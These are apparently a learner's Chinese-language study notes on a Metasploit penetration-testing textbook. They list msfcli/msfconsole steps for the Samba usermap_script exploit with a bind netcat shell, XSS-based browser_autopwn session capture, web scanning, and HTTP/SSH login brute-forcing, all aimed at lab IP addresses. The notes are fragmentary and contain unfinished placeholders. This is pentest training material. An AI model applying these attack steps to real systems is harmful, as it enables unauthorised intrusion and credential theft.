《Metasploit魔鬼训练营》笔记
第零章 实验环境
2.1.1渗透测试环境拓扑结构
PS:(1)账号密码
(2)Win2K3不要
进
行VM-Tools的更新
第一章 初识metasploit
1.6.2 msfconsole控制台终端
(1)search samba 寻找攻击samba服务模块,use *******选择某个某块 (2)show payloads 查看相关兼容的攻击载荷,set payload ****选择,即渗透成功后执行Shell
(3)完成渗透攻击及攻击载荷后,show options查看配置的参数,Such as:set RHOST ***.***.***.*** (4)exploit 启动攻击 1.6.3 msfcli命令行程序
(1)msfcli multi/samba/usermap_script S显示该攻击模块详细信息 (2)msfcli multi/samba/usermap_script P查看可用攻击载荷
(3)msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat O查看该攻击载荷需要配置的参数
(4)msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat T查看攻击模块目标类型列表
(5)msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=10.10.10.254 E启动 成功则显示:
[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:40545 -> 10.10.10.254:4444) at 2016-01-31 08:01:27 -0500
第二章情报搜集技术
2.1外围信息搜集 2.1.1DNS&IP
whois,nslookup,dig等工具
ip地址:http://www.cz88.net/(国内) 子父域名:http://searchdns.netcraft.com/ Ip反查:渗透目标为虚拟主机 *****************待补
第三章WEB应用渗透技术
3.1.5基于metasploit的Web应用渗透技术 (1)load wmap加载wmap Web扫描器 (2)配置相关 sites targets 运行run
wmap_sites -a 10.10.10.129 wmap_targets -t 10.10.10.129 wmap_run–t查看会使用的模块 wmap_run–e 开始扫描 vulns查看漏洞信息
3.2.1开源Web应用漏洞扫描工具这里有张表 3.2.2W3af
<1>
(1)进入pentest/web/w3af ./w3af_console开始配置 (2)plugins插件部分
Such as 暴力破解,发现,审计模块 (3)目标及结果存储配置 (4)start
PS:生成文件在pentest/web/w3af目录下
<2> ~~~
终端植入输入w3af启动图形界面 3.2.3 SQL注入漏洞探测
// (1)use auxiliary/scanner/http/sqlmap
Kali 2.0 下直接根目录中输入sqlmap [options] 3.2.4 XSS漏洞探测 ./w3af_gui
扫描结果分析??????? 3.3.2跨站攻击实例分析
Xssf安装:XSSF文件夹中的data、lib、modules、plugins与msf3下的文件
夹合并即可
PS: 路径 /opt/metasploit/msf3
Kali2016:/usr/share/metasploit-framework
(1) 根据generic xss injection 注入储存性跨站脚本 (2) 加载xssf模块,xssf_victims查看攻击成功的目标 (3) Xssf_information查看靶机信息
(4) Use auxiliary/server/browser_autopwn设置监听端口地址等,exploit (5) 发现可用攻击模块,jobs查看 (6) Xssf_exploit 2(目标) 14(攻击模块) (7) Session 查看截取会话 3.3.3命令注入实例分析
Php脚本代码:http://www.68idc.cn/help/server/safe/20150405309918.html Php脚本改写为攻击模块与对应的payload 3.3.4文件包含和文件上传漏洞
类似便利路径
本地文件包含于远程文件包含(是浏览器远程主机上的文件) ???添加攻击模块出错
第四章网络服务渗透
4.1内存攻防
内存中的数据变为指令被执行 4.1.1缓冲区溢出 4.2网络服务渗透 4.3 MS08-067 4.4 Oracle
4.5 KingView 6.53 HistorySvr 4.6 linux
第五章客户端渗透攻击 第六章社会工程学
Maltego
6.4社会工程学工具包 Setoolkit
第八章移动环境渗透测试
8.2.2破解无线AP管理密码
PS:登录界面不一定使用的80端口 1.默认的初始密码 2.弱口令猜测
<1>http用户名密码:
(1)use auxiliary/scanner/http/http_login模块
(2)set ********, run(RHOST RPORT user_filepass_file) PS:密码生成器:crunch <2>ssh登录密码
(1) use auxiliary/scanner/ssh/ssh_login (2) 获得shell会话后,session–i 1 交互后 (3) Unmae-a id